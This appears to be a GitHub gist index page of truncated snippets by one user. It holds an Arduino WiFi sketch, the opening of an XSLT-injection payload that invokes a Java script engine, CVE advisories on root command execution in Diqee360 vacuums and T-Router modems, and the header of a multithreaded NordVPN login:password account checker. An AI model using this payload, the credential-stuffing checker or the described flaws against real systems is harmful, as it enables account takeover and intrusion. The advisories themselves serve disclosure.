neolead
neolead
/ gist:a806cf1f1056d9efbc4a81984c701319
Created
July 17, 2023 15:50
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Хорошо, давайте создадим два скрипта для Arduino: один будет работать в качестве WiFi сервера (Device 1), второй - в качестве клиента (Device 2). Device 1 будет подключен к компьютеру через USB и будет обеспечивать двустороннюю связь с Device 2, который в свою очередь будет подключен к внешнему устройству через TTL. | |
| WiFi Сервер (Device 1): | |
| #include <WiFi.h> | |
| // WiFi network name and password: | |
| const char * networkName = "Your_SSID"; | |
| const char * networkPswd = "Your_PASSWORD"; | |
| // IP address to connect to: | |
| IPAddress local_IP(192,168,1,184); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" | |
| xmlns:xsl="http://www.w3.org/1999/XSL/Transform" | |
| xmlns:j="http://xml.apache.org/xalan/java" exclude-result-prefixes="j" | |
| > | |
| <xsl:template match="/"> | |
| <xsl:variable name="sem" select="j:javax.script.ScriptEngineManager.new()"/> | |
| <xsl:variable name="se" select="j:getEngineByName($sem, 'JavaScript')"/> | |
| <xsl:variable name="js"> | |
| <![CDATA[ | |
| new java.util.Scanner( |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2018-10987 | |
| [Suggested description] | |
| An issue was discovered on Dongguan Diqee Diqee360 vacuum cleaner devices. | |
| The affected vacuum cleaners suffers from an authenticated remote code | |
| execution vulnerability. An authenticated attacker can send a | |
| specially crafted UDP packet, and execute commands on the vacuum | |
| cleaner as root. The bug is in the function REQUEST_SET_WIFIPASSWD (UDP command 153). | |
| A crafted UDP packet runs "/mnt/skyeye/mode_switch.sh %s" with an | |
| attacker controlling the %s variable. In some cases, authentication |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Nordvpn account check tool v1.2 Created by matrix | |
| # | |
| #Run like bash chk2.sh filename.txt filename.txt must be in login:password format | |
| #Working proxy accounts will be stored into work.txt Multithreaded tool. default 190 threads, you can change inside. | |
| if [[ $# -eq 0 ]] ; then | |
| echo 'Nordvpn check tool v1.2' | |
| echo 'Created by matrix' | |
| echo 'Run like bash chk2.sh filename.txt' | |
| echo 'filename.txt must be in login:password format' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Just a pawn test of hackerone.com/neolead |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2018-10988 | |
| [Suggested description] | |
| An issue was discovered on Diqee360 devices (http://diqee.com). | |
| A firmware update process, integrated into the firmware, starts at boot and tries to find the update folder on the microSD card. | |
| It executes code, without a digital signature, as root from the | |
| /mnt/sdcard/$PRO_NAME/upgrade.sh or /sdcard/upgrage_360/upgrade.sh pathname. | |
| ------------------------------------------ | |
| [Additional Information] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2018-11241 | |
| [Suggested description] | |
| An issue was discovered on SoftCase T-Router build 20112017 devices. | |
| A remote attacker can read and write to arbitrary files on the system | |
| as root, as demonstrated by code execution after writing to a crontab file. | |
| This is fixed in production builds as of Spring 2018. | |
| ------------------------------------------ | |
| [Additional Information] | |
| The T-Router protocol contains not only the functions of executing the | |
| above-mentioned commands of the 'top' level, but also commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CVE-2018-11240 | |
| [Description] | |
| An issue was discovered on SoftCase T-Router build 20112017 devices. | |
| There are no restrictions on the 'exec command' feature of the | |
| T-Router protocol. If the command syntax is correct, there is code | |
| execution both on the other modem and on the main servers. This is | |
| fixed in production builds as of Spring 2018. | |
| ------------------------------------------ | |
| [Additional Information] | |
| The vulnerability is hide in no limitations for executing the 'exec |